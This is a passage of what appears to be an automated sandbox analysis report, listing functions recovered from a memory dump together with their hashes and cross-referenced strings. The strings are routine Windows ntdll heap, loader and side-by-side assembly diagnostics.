String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: bc4b47dcb411c6bee4659226109a97aab36ddccf1ea8e6a0a73002857d2bd78a
Instruction ID: f0d084cbde6c97fb05679b875eef53f14daa82f35971293b20374c688f745cf8
Opcode Fuzzy Hash: bc4b47dcb411c6bee4659226109a97aab36ddccf1ea8e6a0a73002857d2bd78a
Instruction Fuzzy Hash: 50027FB1D202299BDB21DB14CD81BEAF7B8AF54704F4041EAE70DA7241EB709E94CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01344496, Relevance: 10.4, Strings: 8, Instructions: 417COMMON

Download Yara Rule

Strings

Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 0134486F
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 0134493D
HEAP: , xrefs: 0134465F, 013446C0, 013447D3, 0134485E, 01344924, 01344978
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 01344992
Non-Dedicated free list element %p is out of order, xrefs: 0134466B
HEAP[%wZ]: , xrefs: 01344652, 013446B3, 013447C6, 01344851, 01344917, 0134496B
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 013447E2
dedicated (%04Ix) free list element %p is marked busy, xrefs: 013446CF

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 01b175927cf992793cb6bd7a933e057e040fc8dc3cf6cacaa425a539872fa240
Instruction ID: 21525ac5f7f7353517da7ca939e9450cd16061aaf0ef49656767f42f30e27ecb
Opcode Fuzzy Hash: 01b175927cf992793cb6bd7a933e057e040fc8dc3cf6cacaa425a539872fa240
Instruction Fuzzy Hash: B3F15331A1064ADFEB25DF69C480BBABBF5FF08708F14802DE1569B691D734B985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013431DC, Relevance: 10.2, Strings: 8, Instructions: 190COMMON

Download Yara Rule

Strings

Invalid ReserveSize parameter - %Ix, xrefs: 0134322C
HEAP: , xrefs: 01343220, 01343287, 013432D0, 01343335, 01343383, 013433CA
Specified HeapBase (%p) is free or not writable, xrefs: 013433D8
HEAP[%wZ]: , xrefs: 01343213, 0134327A, 013432C3, 01343328, 01343376, 013433BD
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 013432DB
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 01343392
Invalid CommitSize parameter - %Ix, xrefs: 01343295
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 01343344

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: d92766c4c5446e8ed15918ee6b84035defe6336ec7f73d22e8291025667a3968
Instruction ID: bdc215d43b86a669f859c62652d1cce3c1377827b73a69d9aebf603c32044a19
Opcode Fuzzy Hash: d92766c4c5446e8ed15918ee6b84035defe6336ec7f73d22e8291025667a3968
Instruction Fuzzy Hash: 7F51D832261255EFD711EB99D899E7A77E8FF04B28F04842DF405AB791C671EC80CB11

Uniqueness

Uniqueness Score: -1.00%

Function 012B78A0, Relevance: 8.5, Strings: 6, Instructions: 989COMMON

Download Yara Rule

Strings

T, xrefs: 012B7942
LdrpResSearchResourceInsideDirectory Enter, xrefs: 012B794C
LdrpResSearchResourceInsideDirectory Exit, xrefs: 012B7960
MUI, xrefs: 012B7BCA
R, xrefs: 012B7956
{, xrefs: 012F8CEE

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$MUI$R$T${
API String ID: 0-2515562510
Opcode ID: 1d11650f1b9e859b1da8650135336a785ed0b88a34b879d9e6cb9ed508c965f8
Instruction ID: 64a2768564fa0bd06817d6bcd19c7ce8f84c6f56777fe19517fc164989105234
Opcode Fuzzy Hash: 1d11650f1b9e859b1da8650135336a785ed0b88a34b879d9e6cb9ed508c965f8
Instruction Fuzzy Hash: 6D925871E2421ACFDB65CF98C880BEDFBB5BF44384F148269DA49AB281E7749941CF41

Uniqueness

Uniqueness Score: -1.00%

Function 012AA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMON

Download Yara Rule

Strings

(LONG)FreeEntry->Size > 1, xrefs: 012F213C
HEAP: , xrefs: 012F1E95, 012F1F7E, 012F2131, 012F2269
HEAP[%wZ]: , xrefs: 012F1E88, 012F1F71, 012F2124, 012F225C
((LONG)FreeEntry->Size > 1), xrefs: 012F1F89
(UCRBlock != NULL), xrefs: 012F1EA0
(!TrailingUCR), xrefs: 012F2274

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 7a38ff77df5c3e5c7fcdd0a0a3197da437857cdf07e81b949d91955573cba608
Instruction ID: bf44afcc64ec64dede0e06f03c0685c541f2e4c3b31a5f7ec8378394b98bbd31
Opcode Fuzzy Hash: 7a38ff77df5c3e5c7fcdd0a0a3197da437857cdf07e81b949d91955573cba608
Instruction Fuzzy Hash: C7420D31628782CFD715CF28C884A2ABBE5FF98704F44496DE6868B392D774D981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012BC63D, Relevance: 7.6, Strings: 6, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012FA7C7
SXS: %s() passed the empty activation context, xrefs: 012FA76D
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 012FA7A7
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 012FA788
RtlGetAssemblyStorageRoot, xrefs: 012FA768, 012FA7A2, 012FA7C2
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 012FA780

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: f4fb6dda0f65a963ced4aebbf361321bab75f2177bf775f533246747e0052d45
Instruction ID: a1799829f4263955f7240d0b2d0db20acb8ff73dc045d6de7a27b86fdd678d3f
Opcode Fuzzy Hash: f4fb6dda0f65a963ced4aebbf361321bab75f2177bf775f533246747e0052d45
Instruction Fuzzy Hash: 43310932A70215BBE7259A5A8C82FAFBB79DF51B94F04006DFB0577240D670AD1087E1

Uniqueness

Uniqueness Score: -1.00%

Function 012A2430, Relevance: 6.7, Strings: 5, Instructions: 461COMMON

Download Yara Rule

Strings

minkernel\ntdll\sxsisol.cpp, xrefs: 012ED3D6
Internal error check failed, xrefs: 012ED3DB
, xrefs: 012A24C0
, xrefs: 012A24E4
Status != STATUS_SXS_SECTION_NOT_FOUND, xrefs: 012ED3CC

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
API String ID: 0-3393094623
Opcode ID: 3a598571067fa3959c7c87d5552eace9b87614e7038e535172ef3b3c92d7789c
Instruction ID: ee7d6084cb5daacb1e58b9b260b07e97c8e5762d545f2a33b1ea338a2ef041fa
Opcode Fuzzy Hash: 3a598571067fa3959c7c87d5552eace9b87614e7038e535172ef3b3c92d7789c
Instruction Fuzzy Hash: B902DE70529342CFD725CF68C484BABBBE4BF88B10F94491EFA8997251E370D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013164B5, Relevance: 6.4, Strings: 5, Instructions: 116COMMON

Download Yara Rule

Strings

SR - , xrefs: 0131652D
Name:, xrefs: 013164E7
Type:, xrefs: 013164CE
Language:, xrefs: 013164F6
Item:, xrefs: 01316505

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: Item:$ Language:$ Name:$SR - $Type:
API String ID: 0-3082644519
Opcode ID: 0e3a395ec99aaa99b3fbad86933ddcf22172ccf481e3ecfac110ba1d1599b325
Instruction ID: d7995b8c7f7fd9441879a191198134bf018c5b1a8c9e5c5d177d35e5585ec378
Opcode Fuzzy Hash: 0e3a395ec99aaa99b3fbad86933ddcf22172ccf481e3ecfac110ba1d1599b325
Instruction Fuzzy Hash: 6F41D6B1A00229AFDF24DB69CC49BAABBBCEF41314F0401D5E54997244DE709E84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 012840E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

, passed to %s, xrefs: 012E0469
HEAP: , xrefs: 012E044C
HEAP[%wZ]: , xrefs: 012E043F
Invalid heap signature for heap at %p, xrefs: 012E0458
RtlAllocateHeap, xrefs: 012E0468

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 8626cdc3a4f03bb5dbf3bff0c1eb4de4efb1d41b7167d0e2d2df66d671f9cd73
Instruction ID: 0a560c475c1b58faf9e34354bc82222a3a9757327a123bfff2af168f818e4288
Opcode Fuzzy Hash: 8626cdc3a4f03bb5dbf3bff0c1eb4de4efb1d41b7167d0e2d2df66d671f9cd73
Instruction Fuzzy Hash: CF017032231642DFE329A769E55EF6677ECDB01F30F18402DF1085B6D1CAE498C1C614

Uniqueness

Uniqueness Score: -1.00%

Function 012A5600, Relevance: 6.2, Strings: 3, Instructions: 2418COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 012EEE8B, 012EF109
HEAP[%wZ]: , xrefs: 012EEE7C, 012EF0FA
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 012EEEA5, 012EF123

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 0c2991ef9bb2f207cfc8628114db217d7fb486146975325c54e674b711cc36d8
Instruction ID: 591bcbcdc9f89efd62e746ae3db2b3a77e91bef9cd73936dfa04551e7e7ea182
Opcode Fuzzy Hash: 0c2991ef9bb2f207cfc8628114db217d7fb486146975325c54e674b711cc36d8
Instruction Fuzzy Hash: F723C070A20216DFDB25CF68C4847AEBBF1FF49304F5881A9D54AAB386D774A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012B06C0, Relevance: 5.9, Strings: 4, Instructions: 901COMMON

Download Yara Rule

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 012F508E
HEAP: , xrefs: 012F5083
HEAP[%wZ]: , xrefs: 012F5076
@, xrefs: 012F5250

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 2994545307-3570731704
Opcode ID: 1c89446bf3cf6023cf4930fcdc2500599b65bf9a2c4565c076db27a9ec4a6009
Instruction ID: 0c6f5c708c7d3a68314b8dda56e76b9cc97f772fd652fb5f3411cf157ec89b81
Opcode Fuzzy Hash: 1c89446bf3cf6023cf4930fcdc2500599b65bf9a2c4565c076db27a9ec4a6009
Instruction Fuzzy Hash: 78825B71E21269CFEB25CF18C884BAAB7B5BF44350F0582E9EA49A7241D7709E80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 012B701D, Relevance: 5.6, Strings: 4, Instructions: 569COMMON

Download Yara Rule

Strings

LdrpResSearchResourceMappedFile Enter, xrefs: 012B70B9
MUI, xrefs: 012B75E1
#, xrefs: 012F86BA
LdrpResSearchResourceMappedFile Exit, xrefs: 012B70D4

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: #$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
API String ID: 0-3266796247
Opcode ID: b09f67af77a36b22599b82f5a37834eb1b88ffbfd5010374956b595cc5261e18
Instruction ID: e1a8b8bc40bae9cc3149b09707607b34aaa90a5f9bcb30eec11b1b8aedc221e3
Opcode Fuzzy Hash: b09f67af77a36b22599b82f5a37834eb1b88ffbfd5010374956b595cc5261e18
Instruction Fuzzy Hash: 0232B13196526A8FDF26CF18CC84BEDB7B5AF85380F1440E9EA49A7291D7709E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012AA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 012F22E6, 012F23F6
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 012F2403
HEAP[%wZ]: , xrefs: 012F22D7, 012F23E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 012F22F3

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 35e7300bc9354dc1ee78a26a55a189c74f5dacde840e268c86ad0c6c8ff0c508
Instruction ID: 6d39a77974f9c48a29dc54b9399086eb5409fed4b2b8f1245b6c68ec210db9ea
Opcode Fuzzy Hash: 35e7300bc9354dc1ee78a26a55a189c74f5dacde840e268c86ad0c6c8ff0c508
Instruction Fuzzy Hash: BFD1AC74A202468FDB19CF68C491BBABBF1FF48300F55856DDA5A9B342E374E845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012BC707, Relevance: 5.3, Strings: 4, Instructions: 251COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 012FA7E6
.Local, xrefs: 012BC9A4
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012FA7E1, 012FA8B9
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012FA8BE

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 45dbe48a60fdd2355b6ee220e0de36c8801205ca11aa09c63ba0b01c070e6dee
Instruction ID: bd56e12bfd8a52d0c301639e3021c3a6f8f1652ce2ac006d6c614571d94966aa
Opcode Fuzzy Hash: 45dbe48a60fdd2355b6ee220e0de36c8801205ca11aa09c63ba0b01c070e6dee
Instruction Fuzzy Hash: 97A1CF3192022ADBDB25CF58CCC8BE9B7B5AF58364F1441EADA09A7250D7709E81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012B7620, Relevance: 5.2, Strings: 4, Instructions: 220COMMON

Download Yara Rule

Strings

{, xrefs: 012F8841
LdrpResGetResourceDirectory Enter, xrefs: 012B7645
MUI, xrefs: 012B76BD, 012B781D
LdrpResGetResourceDirectory Exit, xrefs: 012B7657

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$MUI${
API String ID: 0-3203766739
Opcode ID: 0e0aa48edbdc5d4c43d4ff4547b53898f8370e422a04b6dd54ed62c3a6f20bfd
Instruction ID: 68e327029f46168666d1f008802b8aa85a42d05885e775d1d71a6c82ca4a42fe
Opcode Fuzzy Hash: 0e0aa48edbdc5d4c43d4ff4547b53898f8370e422a04b6dd54ed62c3a6f20bfd
Instruction Fuzzy Hash: CD81F835D2424ACFEB25CF58C8817EEB7B5FF41394F184199DA11AB2D1D3B89A80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012AD1EF, Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012F3513
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012F348D
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012F34D0
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012F344A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 25e13b30f97f31fc7fc4b7d4d1f84585b4567c7aa828da0e33c949c10ab34bc8
Instruction ID: ec7fdf6a2e8dff4e7624aa5ce6764bb23768af86cf5fb01080d5b2ffcb7fd01e
Opcode Fuzzy Hash: 25e13b30f97f31fc7fc4b7d4d1f84585b4567c7aa828da0e33c949c10ab34bc8
Instruction Fuzzy Hash: D17101B191430A9FC721DF98C885BABBFA9EF54764F800528FA484B683D734D588CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 012AA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 012F1DE4
HEAP[%wZ]: , xrefs: 012F1DD7
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 012F1DF9
`, xrefs: 012F1C8D

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 5330cd666ae06fffef12afeef4bf536adbbd0f88f2456846a358f2cd23878be1
Instruction ID: 4f665d11699be6772fd4aedb2f1697c4a1ee424a92509a13092ef427d65af30a
Opcode Fuzzy Hash: 5330cd666ae06fffef12afeef4bf536adbbd0f88f2456846a358f2cd23878be1
Instruction Fuzzy Hash: 9D510732225682DFE712DB68C845F77BBE8FF80B50F480468F6558B291D775E850CB62

Uniqueness

Uniqueness Score: -1.00%

Function 013449A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 01344AD6
HEAP: , xrefs: 01344A4A, 01344A5D, 01344A5F, 01344AC4
HEAP[%wZ]: , xrefs: 01344A3D, 01344AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01344A61

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 35bfbaf35f71bcf4d95fea861cc2954d3ffd8dd67259bb2ba37e12a486b029a1
Instruction ID: 437ee1fd78b0631f865a323d0f49e57801d7d00e20bd8fbb630ba135c3fdf6b5
Opcode Fuzzy Hash: 35bfbaf35f71bcf4d95fea861cc2954d3ffd8dd67259bb2ba37e12a486b029a1
Instruction Fuzzy Hash: E5312632221144EFE721DB59C889F6B77E8EF04B28F244169F505CB291D671F980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0128751A, Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

VirtualQuery Failed 0x%p %x, xrefs: 012E284E
HEAP: , xrefs: 012E2804, 012E2841
VirtualProtect Failed 0x%p %x, xrefs: 012E2811
HEAP[%wZ]: , xrefs: 012E27F7, 012E2834

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: c2a388133ad9a4dc3b11c9393dc72a0fd8eb06f207fde89ef5389360c48cccdc
Instruction ID: f08e2a35f10059c4ae34e2e1d2a4c94f69c00e040ac1a1e75e402508053f6d90
Opcode Fuzzy Hash: c2a388133ad9a4dc3b11c9393dc72a0fd8eb06f207fde89ef5389360c48cccdc
Instruction Fuzzy Hash: 3E31E532921145EFDB11EB59D889FAEBBBCEB44B20F144169F905AB291D670ED40CA70

Uniqueness

Uniqueness Score: -1.00%

Function 01343518, Relevance: 5.1, Strings: 4, Instructions: 55COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01343555
HEAP[%wZ]: , xrefs: 01343548
May not destroy the process heap at %p, xrefs: 01343561
RtlDestroyHeap, xrefs: 01343571

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
API String ID: 0-4256168463
Opcode ID: f5d7563f7f179f08b961ca2ec9baa7bd036bf44809d485b9742ccfff84ec9a37
Instruction ID: 4a1c637d6907adb3b5ed6a7cb7ea5e143c4787bce088fdb4fa1be8accd206cfd
Opcode Fuzzy Hash: f5d7563f7f179f08b961ca2ec9baa7bd036bf44809d485b9742ccfff84ec9a37
Instruction Fuzzy Hash: E101F532171215DFCB25FB6D8444BA677E8FF41B24F048499E4069B791DA70F940CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 012A99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 012F155D, 012F1624, 012F17C9, 012F1912
HEAP[%wZ]: , xrefs: 012F1550, 012F1617, 012F17BC, 012F1905
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 012F1572, 012F1639, 012F17DE, 012F1927

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 97acde2759fdbb48aa6b59e0385357eb77141013b90a24c26dc997cbc926dca7
Instruction ID: a387f4cf0291de43232406f842b4b7f9f842166a5d40541e348cecba6ff7b378
Opcode Fuzzy Hash: 97acde2759fdbb48aa6b59e0385357eb77141013b90a24c26dc997cbc926dca7
Instruction Fuzzy Hash: 7722EE70A20242DFEB24CF29C495B7AFBB5EF44704F68856DE6468B382E771D891CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012AB477, Relevance: 4.2, Strings: 3, Instructions: 405COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 012F2980
HEAP[%wZ]: , xrefs: 012F2973
(UCRBlock->Size >= *Size), xrefs: 012F298B

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 4386f19434eaecffd5deb1e9ff4504121ebf3728b13831d6c9a1e1cb65715830
Instruction ID: 5eabcdcd0d57f3e0dc42165bd5bc3b99413d426fc774c594da33a30f5b29f96d
Opcode Fuzzy Hash: 4386f19434eaecffd5deb1e9ff4504121ebf3728b13831d6c9a1e1cb65715830
Instruction Fuzzy Hash: 4CE1BD70620606DFDB19CF68C894BBABBB5FF45704F2481A9E6069B391D770E981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012962A0, Relevance: 4.0, Strings: 3, Instructions: 291COMMON

Download Yara Rule

Strings

MUI, xrefs: 012962B8, 012963B7
LdrResGetRCConfig Enter, xrefs: 012962E2
LdrResGetRCConfig Exit, xrefs: 012962F4

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 3fae7890c12328b8500fd861a4314fdd364bc9c9fba24f400e538581d1010dbd
Instruction ID: 2d483bd0e12408443c89d7410bbacf9386d8128e8320b66eb7961d5be9863852
Opcode Fuzzy Hash: 3fae7890c12328b8500fd861a4314fdd364bc9c9fba24f400e538581d1010dbd
Instruction Fuzzy Hash: BFB1B171A206169BDF15CFACD880BACBBF5BF44718F548129EA11EB394D731E850CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01298794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON

Download Yara Rule

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 012E9C18
minkernel\ntdll\ldrsnap.c, xrefs: 012E9C28
LdrpDoPostSnapWork, xrefs: 012E9C1E

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 203d92031da1a0af537bc23d18ec7e0c51a81323c4d1dfb6a2d0d93417ea8109
Instruction ID: 5e9ed9c2fd6788e0d494d330fe077dd52e5c8124421e7dfba310ab1edce8ad44
Opcode Fuzzy Hash: 203d92031da1a0af537bc23d18ec7e0c51a81323c4d1dfb6a2d0d93417ea8109
Instruction Fuzzy Hash: C191F231A2020FDBEF28DF5DD481ABAB7B9FF46314B48416DDA05AB241D770E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01288239, Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

\??\, xrefs: 012E2E2A
FilterFullPath, xrefs: 012E2F2C
UseFilter, xrefs: 01288263

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 0eefed4bec24fc56c1f4b3692ea250ec327e8386bcc2c78acde78777c64d8494
Instruction ID: 790ab67a7e78409c4a339720ac269e534202d706f3fdb4367ee10cdae2e8aff1
